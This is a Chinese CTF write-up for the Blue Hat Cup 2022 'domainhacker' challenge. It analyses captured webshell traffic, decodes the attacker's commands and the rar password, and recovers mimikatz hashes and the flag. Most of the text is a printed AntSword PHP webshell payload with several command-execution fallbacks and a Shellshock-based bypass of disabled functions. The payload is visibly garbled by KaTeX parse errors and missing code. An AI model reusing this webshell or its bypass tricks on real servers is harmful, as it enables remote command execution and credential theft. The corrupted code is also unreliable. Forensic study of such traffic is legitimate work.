
[蓝帽杯 2022 初赛]domainhacker trackboy的WriteUp

2023-08-30 07:58By
trackboy
流量分析 / Webshell流量 / 域渗透 / MISC

1.过滤 HTTP 协议,然后分析 HTTP 数据,发现传输的一段代码,对其进行 URL 解码,然后 json 格式化

a = @ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
_SERVER["SCRIPT_FILENAME"]);
opdir);
@array_push(ocwd, sys_get_temp_dir());
foreach(item) {
if (!@is_writable($item)) {
continue;
};
item.
"/.c46a89a";
@mkdir($tmdir);
if (!@file_exists($tmdir)) {
continue;
}
@chdir($tmdir);
@ini_set("open_basedir", "..");
KaTeX parse error: Undefined control sequence: \/ at position 29: …g_split("/\\\\|\̲/̲/", tmdir);
for (i < sizeof(i++) {
@chdir("..");
};
@ini_set("open_basedir", "/");
@rmdir($tmdir);
break;
};
};;

function asenc($out) {
return $out;
};

function asoutput() {
$output = ob_get_contents();
ob_end_clean();
echo "79c2".
"0b92";
echo @asenc($output);
echo "b4e7e".
"465b62";
}
ob_start();
try {
_POST["yee092cda97a62"], 2));
_POST["q8fb9d4c082c11"], 2));
_POST["p48a6d55fac1b1"], 2));
_SERVER["SCRIPT_FILENAME"]);
d, 0, 1) == "/" ? "-c "{KaTeX parse error: Expected 'EOF', got '}' at position 2: s}̲\"" : "/c \"{s}"";
if (substr($d, 0, 1) == "/") {
@putenv("PATH=".getenv("PATH").
":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin");
} else {
@putenv("PATH=".getenv("PATH").
";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;");
}
if (!empty($envstr)) {
envstr);
foreach(v) {
if (!empty($v)) {
@putenv(str_replace("|||askey|||", "=", $v));
}
}
}
KaTeX parse error: Expected '}', got 'EOF' at end of input: r = "{p} {$c}";

function fe($f) { $d = explode(",", @ini_get("disable_functions")); if (empty($d)) { $d = array(); } else { $d = array_map('trim', array_map('strtolower', $d)); } return (function_exists($f) && is_callable($f) && !in_array($f, $d)); }; function runshellshock($d, $c) { if (substr($d, 0, 1) == "/" && fe('putenv') && (fe('error_log') || fe('mail'))) { if (strstr(readlink("/bin/sh"), "bash") != FALSE) { $tmp = tempnam(sys_get_temp_dir(), 'as'); putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1"); if (fe('error_log')) { error_log("a", 1); } else { mail("a@127.0.0.1", "", "", "-bv"); } } else { return False; } $output = @file_get_contents($tmp); @unlink($tmp); if ($output != "") { print($output); return True; } } return False; }; function runcmd($c) { $ret = 0; $d = dirname($_SERVER["SCRIPT_FILENAME"]); if (fe('system')) { @system($c, $ret); } elseif(fe('passthru')) { @passthru($c, $ret); } elseif(fe('shell_exec')) { print(@shell_exec($c)); } elseif(fe('exec')) { @exec($c, $o, $ret); print(join(" ",$o));}elseif(fe('popen')){$fp=@popen($c,'r');while(!@feof($fp)){print(@fgets($fp,2048));}@pclose($fp);}elseif(fe('proc_open')){$p = @proc_open($c, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);while(!@feof($io[1])){print(@fgets($io[1],2048));}while(!@feof($io[2])){print(@fgets($io[2],2048));}@fclose($io[1]);@fclose($io[2]);@proc_close($p);}elseif(fe('antsystem')){@antsystem($c);}elseif(runshellshock($d, $c)) {return $ret;}elseif(substr($d,0,1)!=" / " && @class_exists(" COM ")){$w=new COM('WScript.shell');$e=$w->exec($c);$so=$e->StdOut();$ret.=$so->ReadAll();$se=$e->StdErr();$ret.=$se->ReadAll();print($ret);}else{$ret = 127;}return $ret;};$ret=@runcmd($r." 2 > & 1 ");print ($ret!=0)?" ret = { $ret } ":" ";;}catch(Exception $e){echo " ERROR: //".$e->getMessage();};asoutput();die();&p48a6d55fac1b1=3G&q8fb9d4c082c11=8mY2QgL2QgIkM6L3BocHN0dWR5X3Byby9XV1ciJndob2FtaSAvcHJpdiZlY2hvIGVmYTkyM2JhNTA0JmNkJmVjaG8gMWE0YmU4ODE1ZWY4&yee092cda97a62=yqY21k

2.分析发现该段代码为蚁剑木马。其中编码的字符串:8mY2QgL2QgIkM6L3BocHN0dWR5X3Byby9XV1ciJndob2FtaSAvcHJpdiZlY2hvIGVmYTkyM2JhNTA0JmNkJmVjaG8gMWE0YmU4ODE1ZWY4,直接进行 base64 解码失败;去掉前面 2 个字符(它们不属于 base64 数据)后即可解码:

cd /d "C:/phpstudy_pro/WWW"&whoami /priv&echo efa923ba504&cd&echo 1a4be8815ef8

3.然后逐个分析 TCP 数据流,追踪到 tcp.stream eq 13 时,出现如下编码的字符串:

Y2QgL2QgImM6XFxXaW5kb3dzXFxUZW1wIiZyYXIuZXhlIGEgLVBTZWNyZXRzUGFzc3cwcmRzIDEucmFyIDEudHh0JmVjaG8gZWZhOTIzYmE1MDQmY2QmZWNobyAxYTRiZTg4MTVlZjg%3D(先 URL 解码,再删除前面 2 位)

4.base64 解码得到的字符串:

cd /d "c:\Windows\Temp"&rar.exe a -PSecretsPassw0rds 1.rar 1.txt&echo efa923ba504&cd&echo 1a4be8815ef8

密码为:SecretsPassw0rds

5.导出 HTTP 对象——提取 HTTP 传输中的 rar 文件

6.发现解压需要密码,使用上面得到的密码:SecretsPassw0rds,可解压出来,得到 mimikatz 抓取的 hash 值

7.最终flag:

NSSCTF{416f89c3a5deb1d398a1a1fce93862a7}

© 著作权归作者所有